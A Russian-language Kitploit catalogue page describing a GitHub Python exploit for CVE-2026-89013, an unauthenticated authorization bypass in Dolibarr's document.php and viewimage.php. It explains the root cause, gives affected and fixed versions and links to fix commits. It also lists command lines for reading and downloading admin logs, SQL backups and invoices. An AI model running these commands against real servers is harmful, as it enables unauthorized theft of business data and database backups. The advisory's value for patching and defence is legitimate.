Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-89013 — Python-эксплойт для CVE-2026-89013 — обход авторизации в Dolibarr hashp без аутентификации, позволяющий произвольное чтение файлов, с режимами check, list, hunt, read и download. | Kitploit
Инструменты/GitHubGitHub/faceless0x7/cve-2026-89013
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииВеб-безопасностьТестирование на ПроникновениеАутентификация
GitHubfaceless0x7/cve-2026-89013

CVE-2026-89013

Python-эксплойт для CVE-2026-89013 — обход авторизации в Dolibarr hashp без аутентификации, позволяющий произвольное чтение файлов, с режимами check, list, hunt, read и download.

116 ч 9 мин назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-89013 — Обход авторизации в Dolibarr через hashp=shared

Эксплойт для CVE-2026-89013: document.php и viewimage.php принудительно устанавливают NOLOGIN, когда присутствует параметр hashp. Внутреннее маркерное значение shared пропускает разрешение share-токена, но переопределение контроля доступа всё равно срабатывает для любого непустого значения и устанавливает $accessallowed = 1, отбрасывая результат dol_check_secure_access_document(). Таким образом, неаутентифицированный запрос может прочитать любой файл во всех деревьях modulepart: бизнес-документы, журналы администратора, SQL- резервные копии (modulepart=systemtools), исходники пользовательских модулей (modulepart=packages), а также другие multicompany-сущности через .

&entity=N

Запись: https://www.cve.org/CVERecord?id=CVE-2026-89013

ЗатронутоDolibarr 23.0.4 – 24.0.0
Исправлено24.0.1
Предварительные условиянет (без аутентификации)
Влияниепроизвольное чтение файлов в управляемых каталогах Dolibarr

Первопричина

root@kitploit:~
// htdocs/document.php:189 (24.0.0) — 'shared' пропускает разрешение токена
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }

// htdocs/document.php:292 — но любой hashp принудительно даёт доступ
if (!empty($hashp)) {
    $accessallowed = 1;
    $sqlprotectagainstexternals = '';
}

Регрессия коммита 5028dae981e (2026-08-12), впервые появившаяся в 23.0.4 и 24.0.0. Обход каталогов (../) санитизируется на стороне сервера — это обход авторизации, а не path traversal.

Использование

root@kitploit:~
# detection (safe, nonexistent canary file)
python3 CVE-2026-89013.py https://erp.local check

# readable modulepart trees
python3 CVE-2026-89013.py https://erp.local list

# hunt: dolibarr.log + SQL backups (generated filenames) + user vcards
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save

# read / download
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2

# PDFs via viewimage.php
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf

Только стандартная библиотека (Python 3.8+). Поддерживает --proxy, --insecure, --timeout.

demo

Ссылки

  • Запись CVE: https://www.cve.org/CVERecord?id=CVE-2026-89013
  • Исправленный релиз: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • Коммиты с исправлением:
    • https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    • https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    • https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
  • Источник регрессии: https://github.com/Dolibarr/dolibarr/commit/5028dae981e47dfab349f8fe2ef79b54ae95d1b6

Отказ от ответственности

Только для авторизованного тестирования и исследований. Используйте только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Скачать инструмент